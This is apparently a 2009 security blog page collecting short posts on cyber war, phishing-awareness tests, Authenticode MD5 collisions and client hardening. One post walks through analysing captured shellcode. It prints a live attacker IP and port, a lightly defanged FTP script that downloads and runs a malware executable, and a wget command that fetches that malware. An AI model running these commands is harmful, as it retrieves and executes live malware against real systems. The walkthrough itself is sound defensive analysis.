Recent news have been all bragging about every major country starting “Cyber war” initiatives. USA, UK…
“Elite Military Hacker Squad Would Stop Wars With Bits, Not Bombs
Efforts to drag our military’s cybersecurity into the 21st century are well underway, but John Arquilla, professor at the Naval Postgraduate School, wants more: A preemptive international hacker force, which would cripple enemies before they even become a problem. “ (More …)
There’s an interesting story I read today as part of my daily RSS follow.
The DOJ (Department of Justice) (USA) conducts regular employee security awareness tests. The most recent one was a 2 day e-mail hoax, fishing out of their employees potentially sensitive information.
There are several good things about that:
1 – people will get trained the best way possible – by experience
2 – the information will not leave the company, if somebody gives it out
3 – knowing that they might be tested and lose “points” in case of failure to maintain awareness, they will actually be cautious most of the time…
They have been doing this for the last 3 years – when will you start?
If you want to read the full story – http://news.cnet.com/8301-1009_3-10153795-83.html
I will not post the whole post, as it is not my invention nor my labor, but can’t pass without posting it.. the work is so fascinating, it bugs my mind why has nobody thought of this when designing the signing process? Like, the possibility of MD5 collisions is there for a few years… and I’m more than sure the guys at M$ knew of the issue, but preferred to keep silent about it, hoping it will pass unnoticed… well it didn’t.
What are they gonna do about it now?
http://blog.didierstevens.com/2009/01/17/playing-with-authenticode-and-md5-collisions/
Say, you have captured a suspicious malware traffic, but don’t know what to do with it.
An example: 
The obvious question to ask in view of such an attack is “what are they trying to do” and “was it successful”. To help you answering these questions next time you find yourself on the receiving end of something like this, here’s a quick walk-through on how we went about coming up with the answers.
1. Prune the capture to remove the part that is “filler” (iE all the kkkkllllll in the capture shown)
2. Convert the remaining capture into a binary file. Here’s how I do it:
cat a.txt | cut -b 11-58 | perl -pe ‘s/(..)\s+/chr(hex($1))/ge’ > a.bin
The “cut” command strips out the address to the left and the printed characters to the right, and only leaves the HEX codes, which then are converted by the perl instruction into single byte characters and written into a file that I called “a.bin”
3. Next, use the “sctest” tool of libemu to try and make sense of the code block. Libemu doesn’t always work on such code, but IF it works, it is doing such a stellar job that I’m always trying libemu/sctest first before loading the code into Ollydbg or Objdump for manual analysis. In this case, we’re lucky: sctest makes quick work of the code, and we see that the “connect” function of WinSock is used to establish an outbound TCP connection on port 78.
$sctest -Sgs 10000 < a.bin
success offset = 0×00000031
Hook me Captain Cook!
userhooks.c:127 user_hook_ExitThread
ExitThread(0)
stepcount 8189
[....]
DWORD dwProcessId = 4712;
DWORD dwThreadId = 4714;
};
) = -1;
int connect (
SOCKET s = 66;
struct sockaddr_in * name = 0x0041714a =>
struct = {
short sin_family = 2;
unsigned short sin_port = 19968 (port=78);
struct in_addr sin_addr = {
unsigned long s_addr = 118898138 (host=218.61.22.7);
};
char sin_zero = “ “;
};
int namelen = 16;
[...]
4. Let’s connect to the address and port that libemu so nicely revealed … and lookie, we get an FTP script that downloads and starts an EXE from 3322.orrrg (org changed to orrrg to keep you from clicking 
$nc 218.61.22.7 78
echo open a528.3322.orrrg>1.txt
echo 2967>>1.txt
echo 2967>>1.txt
echo binary>>1.txt
echo get 2967.exe>>1.txt
echo bye>>1.txt
ftp -s:1.txt
2967.exe
2967.exe
2967.exe
del 1.txt
exit
^C
5. Next, we fetch the malware manually
$wget “ftp://2967:2967@a528.3322.orrrg/2967.exe”
[....]
6. Lastly, we analyze 2967.exe with tools like Virustotal (result) ThreatExpert (result) .
Thus, if this had been directed at a server of yours, you would now check the firewall log (IDS, flow log, etc) for an outbound connection attempt to port 78. If nothing is found, the exploit wasn’t successful. If you see the connection to port 78 and it went through (for example because you allow all ports outbound) the next step is to check for the FTP. If the FTP completed as well, you know it is time to re-build that server.
And yes, adding the 3322-dot-org domain to your block list would be a good idea. As you can tell from this diary that we published in 2007, it is by far not the first time that this domain shows up on our malware radar … and the ThreatExpert report included above contains yet another reason to zap this domain and all its subdomains.
Careful: All the badies are still live at this time, shoot your foot at your own risk.
The following list presents common information security mistakes and misconceptions, so you can avoid making them.
Security Policy and Compliance
No matter how much of your IT is outsourced, you have the feeling that the data at the datacenter is secure. Your databases and storage, sometimes your Active Directory and other servers are there. They are secure – the procedures to protect your data are usually tough to bypass and little attackers are brave and smart (or stupid?) enough to try their luck there.
However, it is not at all important.
When somebody attacks you, they will attack your infrastructure, not the one at the datacenter. People bend much easier than equipment, and are much more succeptible to defeat. In fact, who will spend the time in breaking through tens of firewalls and protections at the datacenter, when they could bypass a single (or dual) firewall and get straight into the heart of your company?
New strategy. Before protecting your firewall, your DMZ (I already said in a previous post, that DMZ is useless) – protect your client computers. Yes, build your network with firewalls first, dmz second, internal network and finally client computers – but start protecting your network in depth *from* the client computers, outwards. If your accountant uses Excel, Word and Powerpoint in their work, do not allow them to run Firefox or Skype! Do not give them higher than Guest permissions on their computer! They want to install the latest screensaver? Fine, let them do it at home. No playtime at the company computer network.
Your system administrators, of course, need to work as administrators of their own computers. WRONG! Guest, and Run As when needed.
The CEO needs full access to his computer, of course! … ? – NO! Guest permissions. Unless he signs a document that he is ready to take responsibility for leaking confidential information from his computer, to the internet.
Think about it, and the logic will become clear. Leave one link weak, leave microscopic opening in your security – it *will* be used against you, sooner or later. Make sure you’re not responsible for it, do your job and secure as good as you can.
The user. It’s always the user. I’d rather have a smart user running as administrator on a Windows computer with no firewall, no anti-virus, and no anti-spyware than a dumb user running as limited user on a Ubuntu computer with a firewall, anti-virus, and a rootkit detector. Dumb users click on anything, somehow manage to install untrustworthy software even without administrative privileges, and use easy-to-guess passwords. More …
admin 7:11 pm on 4 October, 2009 Permalink |
This is from 2001!!!
http://w3.cultdeadcow.com/cms/2001/11/the-cult-of-the.html
admin 5:34 pm on 22 October, 2009 Permalink |
http://taosecurity.blogspot.com/2009/10/report-on-chinese-government-sponsored.html